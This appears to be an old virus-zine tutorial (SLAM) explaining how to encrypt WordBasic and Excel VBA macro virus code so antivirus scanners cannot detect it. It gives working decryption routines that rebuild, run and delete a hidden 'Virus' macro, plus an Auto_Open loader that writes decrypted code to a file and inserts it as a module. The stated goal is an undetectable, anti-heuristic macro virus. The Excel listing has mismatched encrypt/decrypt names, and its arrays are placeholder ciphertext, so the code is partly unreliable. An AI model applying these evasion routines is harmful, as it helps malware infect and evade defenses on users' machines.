SLAM3.021: How to encrypt wordbasic and vba code by NJ [SLAM]

Published in

· 25 Feb 2022

------------------------------------------- 
|  How to encrypt wordbasic and vba code  | 
|                                         | 
|         Nightmare Joker [SLAM]          | 
------------------------------------------- 

                   À     À  …ÕÕÕÕª  …ÕÕÕª  …ÕÕÕ 
                   ∫     ∫  ∫    ∫  ∫   ∫  ∫   ∫ 
Let's start with:  ∫  ∫  ∫  ∫    ∫  ∫ÕÕÕº  ∫   ∫ 
~~~~~~~~~~~~~~~~~  ∫  ∫  ∫  ∫    ∫  ∫   ∫  ∫   ∫ 
                   »ÕÕ ÕÕº  »ÕÕÕÕº         »ÕÕÕ

The most macro virus scanner, like HMVS and F/WIN are practically able to find all word macro viruses, which don't hide the main code lines of a macro virus, like "MacroCopy" and "FileSaveAs". The scanners search within the doc/dot files the strings for the macro commands. If you encrypt now the their most important scan strings then they can't find your virus. Probably only for a short time, but the many different ways to encrypt the code let's make your virus undetectable again within a short time, too. ;)

After the SLAM #2 Issue, where the Killok virus would published ask me some people how to encrypt and of course decrypt the wordbasic and vba code. So, in principle it's very easy. For example, if you have the code line:

 FileSaveAs .Format = 1

then you only have to change every ascii sign with the next following. The first ascii sign "F" has the sign code "70". We must now only add "1" to the ascii code of the character and translate it back to the ascii sign. If we make that with the whole Sentence then it looks like that:

 GjmfTbwfBt /Gpsnbu > 2

Of course, you can add "2" or more numbers to the sign code, too.

This in principle really *lame* encryption method is good enough to confuse the heuristic analyse of the av scanners. If you want to use a more complex encryption then consider that WordBasic is REALLY slow! If your virus have about 5000 Bytes then it could take more than 15 seconds to decrypt the code! That could be a little bit to conspicuous. ;)

Look now to the following code. It demonstrate the simple way to encrypt your code within a wordbasic macro:

 ToolsMacro .Name = "OldCODE", .Show = 1, .Edit 
 EditSelectAll : a$ = Selection$() 
 DocClose 2 
 For a = 1 To Len(a$) 
 b$ = Mid$(a$, a, 1) 
 b = Asc(Mid$(a$, a, 1)) 
 c = b + 1 
 If c > 255 Then c = c - 256 
 d$ = d$ + Chr$(c) 
 Next 
 ToolsMacro .Name = "NewCODE", .Show = 1, .Edit 
 Insert d$

The first three code lines open the "OldCODE" macro (normal.dot),

==> ToolsMacro .Name = "OldCODE", .Show = 1, .Edit
and select the whole macro code.
==> EditSelectAll
Copy the selected code lines into the a$ variable
==> a$ = Selection$()
and close it again.
==> DocClose 2

The number "2" behind the DocClose command mean that we close the macro without saving it.

The following code lines encrypt now the code within the a$ variable.

At first create a loop, which jumps back to this line until we have encrypted the last character of the a$ variable.
==> For a = 1 To Len(a$)
Copy the ascii sign of the current position within the ax variable to the b$ variable.
==> b$ = Mid$(a$, a, 1)
Insert now the ascii code of the ascii sign within the bX variable into the integer b.
==> b = Asc(Mid$(a$, a, 1))
Add 1 to the number of the integer b
==> c = b + 1
If the integer c is bigger than 255 then subtract 256 of it.
==> If c > 255 Then c = c - 256
At last insert the *new* encrypted character into the d$ variable
==> d$ = d$ + Chr$(c)
and jump back to the first line of the Loop, if that wasn't the last character of the code within the ax variable.
==> Next a

After that the d$ variable contains the *new* encrypted virus code. Open now a new macro with the name "NewCODE"
==> ToolsMacro .Name = "NewCODE", .Show = 1, .Edit
and insert the encrypted code lines.
==> Insert d$

So, that's it. Now you see the encrypted code in the "NewCODE" macro.
Do NOT close the "NewCODE" macro NOW. Paste and insert it immediately into your new virus/Arrays. If you would close it then our good old M$ Word would destroy the whole encrypted code, because it would try to mark all errors with a space sign. If you would translate that, then your decryption routine would decrypt the space characters too and you would get only some shit. ;)

Let's look now on the encrypted code within the virus. In principle there are three ways to store the encrypted code:

Arrays
Document variable
Macro

The last methode is probably the most difficult methode and is only useful if you want to make a real polymprphic macro virus. The second method has only the advantage that you can reduce the main virus code extreme. The best and fastest method is the first. Arrays are really fast and easy to decode. Look at the following example:

 Dim Shared A$(8) 

 Sub MAIN 
 A$(0) = "û√Õªº∆øõœŒ…ßªΩÃ…Õ" 
 A$(1) = "¿~zóz†√∆ø®ª«ø~ÇÉ" 
 A$(2) = "†…Ãz¡zózãzÆ…zù…œ»Œ†√∆øÕÇÉ" 
 A$(3) = "£¿z†√∆øÕ~Ç†√∆ø®ª«ø~Ç¡ÉÉzñòz||zÆ¬ø»" 
 A$(4) = "†√∆ø¶√ÕŒz¡" 
 A$(5) = "¬~zóz†√∆ø®ª«ø~ÇÉ" 
 A$(6) = "£¿z¿~zñòz¬~zÆ¬ø»" 
 A$(7) = "£¿z°øŒû…Ωœ«ø»Œ∞ªÃ~Ç|•√∆∆…≈|Ézóz||zÆ¬ø»" 
 A$(8) = "†√∆ø≠ª–øõÕzà†…Ã«ªŒzózã" 
 ToolsMacro .Name = "Virus", .Show = 1, .Edit 
   For i = 1 To 8 
        For x = 1 To Len(A$(i)) 
            b = Asc(Mid$(A$(i), x, 1)) 
            c = b - 1 
            If c < 0 Then c = c + 255 
            d$ = d$ + Chr$(c) 
        Next x 
        Insert d$ 
        InsertPara 
        d$ = "" 
    Next i 
    DocClose 1 
    Virus 
    ToolsMacro .Name = "Virus", .Show = 1, .Delete

The first 12 lines are the Arrays and the code for it.

At line 13 begins the main decryption routine. The virus opens there a new macro (normal.dot) with the name "Virus".
=> ToolsMacro .Name = "Virus", .Show = 1, .Edit
Creates a loop (for the 8 Arrays)
=> For i = 1 To 8
and an other loop to decrypt the current variable = A$(i) within the Array.
=> For x = 1 To Len(A$(i))
Get the ascii code from the current ascii sign within the variable A$(i)
=> b = Asc(Mid$(A$(i), x, 1))
Subtract now "1" from the ascii code
=> c = b - 1
If the integer is smaller than 0 then add "255" to it.
=> If c < 0 Then c = c + 255
Translate the ascii code back to the ascii sign and insert it into the d$ variable.
=> d$ = d$ + Chr$(c)
Jump back to the start of the second loop, if the current ascii sign isn't the last of the whole current A$(i) variable.
=> Next x
Insert the decrypted code into the new "Virus" macro.
=> Insert d$
=> InsertPara
Delete the content of the d$ variable now
=> d$ = ""
and jump back to the first loop to decrypt the next variable within the
Array.
=> Next i
If we decrypted the whole A$(8) Array then close and save the "Virus" macro.
=> DocClose 1
That's all. Now you have your main virus within the "Virus" macro and could start it to infect a other file or to do something else. ;)
=> Virus
Of course, at last should you delete the "Virus" macro again.
=> ToolsMacro .Name = "Virus", .Show = 1, .Delete

Isn't it easy? I think it is and it should be really no problem for everyone to use a encrypted code within his own word macro virus.

                       ÀÕÕÕÕ  »ª …º  ÀÕÕÕÕª  ÀÕÕÕÕ  À 
                       ∫       »…º   ∫       ∫      ∫ 
OK, and now on Excel:  ÃÕÕ     …ºª   ∫       ÃÕÕ    ∫ 
~~~~~~~~~~~~~~~~~~~~~  ∫      …º »ª  ∫       ∫      ∫ 
                        ÕÕÕÕ  º   »   ÕÕÕÕº   ÕÕÕÕ   ÕÕÕÕÕ

So, let's look now to a simple decryption method for a excel vba module.

   Dim Shared H$(7) 
   Sub Auto_Open() 
   H$(0) = "••∆ııÒÓËÊ˘ÓÙÛ≥…Ó¯ıÒÊ˛∆ÒÍ˜˘¯•¬•ÀÊÒ¯Í" 
   H$(1) = "••ÿÌÍÍ˘¯≠˘≥”ÊÚÍÆ≥ÿÍÒÍË˘" 
   H$(2) = "••∆Ë˘Ó˚Í‹ÓÛÈÙ¸≥ÿÍÒÍË˘ÍÈÿÌÍÍ˘¯≥…ÍÒÍ˘Í" 
   H$(3) = "••ÿÌÍÍ˘¯≠ß…‘”ßÆ≥ÿÍÒÍË˘" 
   H$(4) = "••∆Ë˘Ó˚Í‹ÓÛÈÙ¸≥ÿÍÒÍË˘ÍÈÿÌÍÍ˘¯≥€Ó¯ÓÁÒÍ•¬•ÀÊÒ¯Í" 
   H$(5) = "••∆ııÒÓËÊ˘ÓÙÛ≥∆Ë˘Ó˚Í‹Ù˜ÁÙÙ≥ÿÊ˚Í" 
   H$(6) = "••‹ÓÛÈÙ¸¯≠ÈÊ˘©Æ≥∆Ë˘Ó˚Ê˘Íø•ÿÌÍÍ˘¯≠ß◊ÍıÒÓËÊ˘ÍßÆ≥…ÍÒÍ˘Í" 
   H$(7) = "••∆ııÒÓËÊ˘ÓÙÛ≥…Ó¯ıÒÊ˛∆ÒÍ˜˘¯•¬•Ÿ˜˙Í" 
   Open "\H.txt" For Output As #1 
   For X = 0 To 7 
      j$ = encrypt(H$(X)) 
      Print #1, j$ 
   Next X 
   Close #1 
   Modules.Add 
   ActiveSheet.InsertFile Filename:="\H.txt" 
   End Sub 

   Function encrypt(k$) 
   For i = 1 To Len(k$) 
       b = Asc(Mid$(k$, i, 1)) 
       c = b - 1 
       d$ = d$ + Chr$(c) 
   Next i 
   decrypt = d$ 
   End Function

The first 10 lines are again the Arrays and the code for it.

Note: The encrypted code within the Arrays is only a example!
I say that, because there are sure again some people, who think they must use this encrypted example code in their own virus. ;)

At line 11 begins the main decryption routine. The virus opens there a normal ascii file (H.txt).
=> Open "\H.txt" For Output As #1
Generates a loop. (0 to number of Arrays)
=> For X = 0 To 7
And decrypt one of the variables within the Array.
=> j$ = decrypt(H$(X))
Insert the decrypted code line into the ascii file H.txt.
=> Print #1, j$
If that wasn't the last variable, then decrypt the next. :)
=> Next X
So, if we have decrypted the whole code then close the ascii file
=> Close #1
and insert a new module into the main virus excel file.
=> Modules.Add
Insert now the decrypted code into the new module.
=> ActiveSheet.InsertFile Filename:="\H.txt"
Well, now you must only start the new module and delete it after that again. That's all you have to do for a excel anti-heuristic virus. ;)

Here still the description of the main decryption routine:
=>Function encrypt(k$)
Generate a loop. (lenght of the loop = lenght of the string k$)
=> For i = 1 To Len(k$)
Get the ascii code from the current ascii sign within the variable k$
=> b = Asc(Mid$(k$, i, 1))
Subtract now "1" from the ascii code
=> c = b - 1
Translate the ascii code back to the ascii sign and insert it into the d$ variable.
=> d$ = d$ + Chr$(c)
Jump back to the begin of the loop.
=> Next i
If we have decrypted the whole code then insert it into the d$ variable.
=> decrypt = d$
=> End Function

Well, that's it. I hope everyone understand this description. If someone want to see a example virus then look at the Anti-Heuristic Excel Virus DON.

bye

-Nightmare Joker-